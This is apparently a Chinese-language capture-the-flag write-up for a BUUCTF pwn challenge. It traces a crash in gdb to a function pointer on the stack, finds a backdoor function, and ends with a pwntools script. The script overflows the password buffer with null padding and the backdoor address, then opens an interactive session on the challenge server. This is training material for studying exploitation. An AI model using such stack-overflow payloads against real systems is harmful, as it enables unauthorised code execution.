### 报错参数溯源

话不多说，直接上题（BUUCTF）

![](https://pic1.imgdb.cn/item/67da600688c538a9b5c06971.png)

一开始就给出了账号密码，但是没什么用

![](https://pic1.imgdb.cn/item/67da601888c538a9b5c06975.png)

在 gdb 中调试发现最后报错了

![](https://pic1.imgdb.cn/item/67da608288c538a9b5c069fd.png)

倒着看 main 函数去跟踪最后一个 password_checker

![](https://pic1.imgdb.cn/item/67da60ea88c538a9b5c06adb.png)

回看之前 run 的时候打印的语句对的上

![](https://pic1.imgdb.cn/item/67da610688c538a9b5c06aed.png)

打印了两句然后报错，问题应该出在 `(**a1)();` 上

查看其汇编发现是 `call rax` 当作函数执行了

![](https://pic1.imgdb.cn/item/67da618688c538a9b5c06b0b.png)

回溯 rax 的值到了 rdi

![](https://pic1.imgdb.cn/item/67da65d388c538a9b5c06f00.png)

继续去主函数中找 rdi 的值又回到了 rax 中，在这之前调用了一个函数，跟进去看看

![](https://pic1.imgdb.cn/item/67da66ca88c538a9b5c074e7.png)

又是取了个地址给 rax

![](https://pic1.imgdb.cn/item/67da6aa688c538a9b5c08330.png)

解析伪代码就是 v2

![](https://pic1.imgdb.cn/item/67da6aed88c538a9b5c08358.png)

去看看 v2 的栈

![](https://pic1.imgdb.cn/item/67da6b0e88c538a9b5c08372.png)

给出了后门函数

![](https://pic1.imgdb.cn/item/67da6b2988c538a9b5c08382.png)

在 read_password 中读取了输入到 s 中

![](https://pic1.imgdb.cn/item/67da6d5388c538a9b5c08971.png)

查看缓冲区发现能覆盖 v2 的值

![](https://pic1.imgdb.cn/item/67da6db288c538a9b5c08d1b.png)

最后还调用了 snprintf() 函数，使用 `\x00` 截断

![](https://pic1.imgdb.cn/item/67da6fda88c538a9b5c0abfc.png)

构造 payloiad

```python
from pwn import *
 
r = remote('node5.buuoj.cn',29677)
 
backdoor = 0x400e88

r.sendlineafter(': ',b'admin')
r.sendlineafter(': ',b'2jctf_pa5sw0rd' + b'\x00' * 0x3a + p64(backdoor))
 
r.interactive()
```

